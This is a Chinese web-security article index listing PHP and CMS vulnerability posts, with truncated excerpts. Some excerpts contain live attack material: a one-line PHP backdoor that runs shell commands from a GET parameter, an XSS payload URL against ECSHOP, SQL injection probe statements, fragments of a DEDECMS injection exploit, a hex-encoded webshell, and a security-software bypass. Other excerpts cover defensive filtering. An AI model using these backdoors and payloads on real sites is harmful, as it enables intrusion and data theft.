PHP网站常见安全漏洞和防范措施总结 - 网站安全关注热度:32

目前，基于PHP的网站开发已经成为目前网站开发的主流，本文笔者重点从PHP网站攻击与安全防范方面进行探究，旨在减少网站漏洞，希望对大家有所帮助!一、常见PHP网站安全漏洞对于..[详情]

易想团购开源版#sql注入两个 - 网站安全 - 自学关注热度:24

http: 127 0 0 1 easethink message php?act=if($_REQUEST[ 39;act 39;] == 39;add 39;){if(!$user_info){showErr($GLOBALS[ 39;lang 39;][ 39;PLEASE_LOGIN_FIRST 39;]);}if($_REQUEST[ 39;conten..[详情]

ECSHOP后台getshell - 网站安全 - 自学php关注热度:37

admin edit_languages phpelseif ($_REQUEST[ 39;act 39;] == 39;edit 39;){ * 语言项的路径 * $lang_file = isset($_POST[ 39;file_path 39;]) ? trim($_POST[ 39;file_path..[详情]

ECSHOP 后台sql注入漏洞2枚（鸡肋） - 网站安全 -关注热度:34

admin affiliate_ck phpif ($_REQUEST[ 39;act 39;] == 39;list 39;){ $logdb = get_affiliate_ck(); $smarty-assign( 39;full_page 39;, 1); $smarty-assign( 39;ur_he..[详情]

建站之星(sitestar)最新版后台GETSHELL - 网站安全关注热度:36

建站之星(sitestar)最新版后台GETSHELL，修改任意文件名。非解析漏洞，利用自带编辑器重命名功能编辑器里选本地上传随意上传一图片木马。选择图片空间。20131211092219_24293 jpg是我刚刚上..[详情]

startbbs开源论坛存储型xss可盲打管理员 - 网站安全关注热度:25

startbbs某处对用户输出过滤不当导致存储型xssstartbbs 采用mvc架构设计。但是在对用户个人资料输入输出过滤不当，导致跨站脚本攻击。1、目标定位在：多个用户可以输入的地方，我拿个..[详情]

易思ESPCMS设计缺陷可登录任意账号 - 网站安全关注热度:17

易思ESPCMS某处设计缺陷（验证过弱）可登录任意用户账号易思ESPCMS cookie存在设计缺陷我看下cookie都有哪些参数ecisp_home_seccodeecisp_member_usernameecisp_member_infofunction member_cookieview($keywo..[详情]

ecshop 反射型xss#01 - 网站安全 - 自学php关注热度:42

http: www ecshop cn compare php?goods[]=14goods[]=23%22%20onmouseover%3dalert%28 xss %29%20bad%3d%22goods[]=32goods[]=13goods[]=3goods[]=7goods[]=9修复方案：过滤..[详情]

介绍一个奇特的PHP一句话后门 - 网站安全 - 自学关注热度:32

?php *@example http: www myhack58 com shell php?exec=dir@by LUC Team* @print_r(`{$_GET[ 39;exec 39;]}`); 或echo(`{$_GET[ 39;exec 39;]}`);? 当某种情况下众多变异后门均被过滤时，您可尝试一..[详情]

如何检查网站是否有漏洞或是否被攻击过 - 网站关注热度:21

如何知道您的网站有没有漏洞呢？近来很多网站受到了各种各样形式的攻击，黑客攻击的动机各不一样，黑客人攻击的目标也有不确定性，作为一家企业的网管、或CEO您是否担心您的网..[详情]

浅谈WordPress程序的入侵思路和防御 - 网站安全关注热度:25

wp程序，广受国内外站长们的喜爱，也因此，wp程序的安全也是一直以来做的不错的，说到入侵wp博客，小菜也没经验，完全是找了些这类的文章看了下，然后自己在琢磨点思路，所以还..[详情]

渗透常用SQL注入语句大全 - 网站安全 - 自学php关注热度:18

1 判断有无注入点; and 1=1 and 1=22 猜表一般的表的名称无非是admin adminuser user pass password 等 and 0(select count(*) from *)and 0(select count(*) from admin) 判断是否存在..[详情]

Paypal的一个Dom型XSS漏洞分析 - 网站安全 - 自学p关注热度:22

DOM xss也称为第三种类型的xss或者类型0。现在DOM型的xss越来越多了，除了因为各种JS库比如YUI，Jquery，Jquery mobile等的使用，还有很多编程语言，比如php更多的支持了HTML5的特性。W3school的..[详情]

xss实例-输出在之间的情况 - 网站安全 - 自学php关注热度:22

1 我们找到这么一个点，也是输入和输出都未过滤的一个点。相比教程第一例，其特殊之处在于，是输出在了 script[输出] script之间。http: activity soso com common setParentsInfo php?callback=aaaaaaa..[详情]

xss实例-什么都没过滤的情况 - 网站安全 - 自学关注热度:19

1 XSS的存在，一定是伴随着输入，与输出2个概念的。2 要想过滤掉XSS，你可以在输入层面过滤，也可以在输出层面过滤。3 如果输入和输出都没过滤。 那么漏洞将是显而易见的。4 作为第..[详情]

WEB第三方应用SQL语句安全规范 - 网站安全 - 自学关注热度:23

1 规范目的随着RDS用户的增多，越来越多的应用开始使用RDS数据进行数据存储，很多应用都直接或间接跟金钱相关，所以关于第三方应用WEB系统的代码安全、以及和SQL有关的编码规范变得..[详情]

asp防止上传图片木马原理 - 网站安全 - 自学php关注热度:19

asp防止上传木马原理：首先判断文件大小：if file filesize10 then Response Write(scriptalert( 39;您没有选择上传文件 39;) script) Response Write(scripthistory go(-1) script)..[详情]

php利用验证码防止恶意注册学习笔记 - 网站安全关注热度:26

代码如下?php 随机生成一个4位数的数字验证码$num=; for($i=0;$i4;$i++){ $num = rand(0,9); } 4位验证码也可以用rand(1000,9999)直接生成 将生成的验证码写入session，备验证页面使用..[详情]

php过滤所有恶意字符 - 网站安全 - 自学php关注热度:70

大牛飘过吧,给小黑阔们学习交流用!code： php 批量过滤post,get敏感数据if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);}function stripslashe..[详情]

深喉咙CMS(shlcms PHP)SQL注射0day - 网站安全 - 自学关注热度:30

（PS：这CMS的名字令人遐想)http: www shenhoulong com 隶属公司http: company loooe com Deepthroat content poll - index phpif ($request[ 39;vtype 39;]== 39;a 39;)57 {58 $db-query(UPD..[详情]

过安全狗的一种方法 - 网站安全 - 自学php关注热度:20

某站iis6 0环境，有fckeditor编辑器，可以成功上传x asp; txt，所在目录也没有去掉脚本执行权限。但是有安全狗，一访问所传的url脚本（x asp; txt），该脚本就会自动被删除。但如果该目录下..[详情]

powershell写的一句话管理程序 - 网站安全 - 自学关注热度:81

自己根据程序恢复吧%Id = Request QueryString(Id)Select Case IdCase 1 39;004 rarImage = 526172211A0700CF907300000D00000000000000EFF57420902F00DE0000007E05000002B81C41EFEAAE353F1D330A00..[详情]

一个找二层目录的小东东 - 网站安全 - 自学php关注热度:25

碰到个虚拟主机,iis7 0 里边有上万个站,只有脚本权限,没命令行权限,但是可以跨目录写文件 如果能得到目标站的物理目录,能立马搞定 但是想尽一切办法,也没找到物理路径 所以只有用脚..[详情]

gitbucket1.8版本 关于readme.md的XSS漏洞 - 网站安全关注热度:31

最近在利用gitbucket用作项目开发中的代码托管工具。简单介绍一下gitbucket：gitbucket是一个仿github界面的代码托管工具。使用scala语言开发，利用jgit开源工具管理和操作git命令，内置了一..[详情]

PHP中的Session及其一些安全措施 - 网站安全 - 自学关注热度:20

有一点我们必须承认，大多数web应用程序都离不开session的使用。这篇文章将会结合php以及http协议来分析如何建立一个安全的会话管理机制。我们先简单的了解一些http的知识，从而理解..[详情]

DEDECMS全版本无视GPC注入exp - 网站安全 - 自学php关注热度:26

?phpprint_r(+------------------------------------+DEDECMS全版本无视GPC注入code by :SunshieUsage:$argv[0] domainExample: php exe$argv[0] www phpinfo me+----------------------------------..[详情]

Shopwind网店系统管理后台验证绕过漏洞 - 网站安全关注热度:24

shopwind网店系统后台验证不严，导致cookie欺骗0x00 在 admin 目录下的index asp文件中，包含了唯一一个认证文件如下!-- include file=admin_judge asp --0x01 同目录下的admin_judge asp内容如下，%..[详情]

ThinkSNS设计缺陷导致信息泄漏 - 网站安全 - 自学关注热度:38

ThinkSNS设计缺陷导致信息泄漏，弱密码害人害自。问题发生在 public memcache phpdefine( 39;ADMIN_USERNAME 39;, 39;admin 39;); Admin Usernamedefine( 39;ADMIN_PASSWORD 39;, 39;admin 39;)..[详情]

QQ空间某功能缺陷导致日志存储型XSS - 网站安全关注热度:20

QQ空间某功能缺陷导致日志存储型XSS，没有二哥的精彩分析，也没有什么精彩的绕过技术，just a xss新建一个日志，插入一首歌。歌曲所生成的flash是白名单。如：object allowscriptaccess=alwa..[详情]

Modoer点评系统存储型XSS - 网站安全 - 自学php关注热度:30

Modoer点评系统某处存储型XSS，可直接跨进后台在礼品兑换处：联系地址和备注处没有过滤，可以跨进后台：可以收到管理的cookie：这里管理员登陆的cookie只有Z9S61_adminid和Z9S61_adminhash两个..[详情]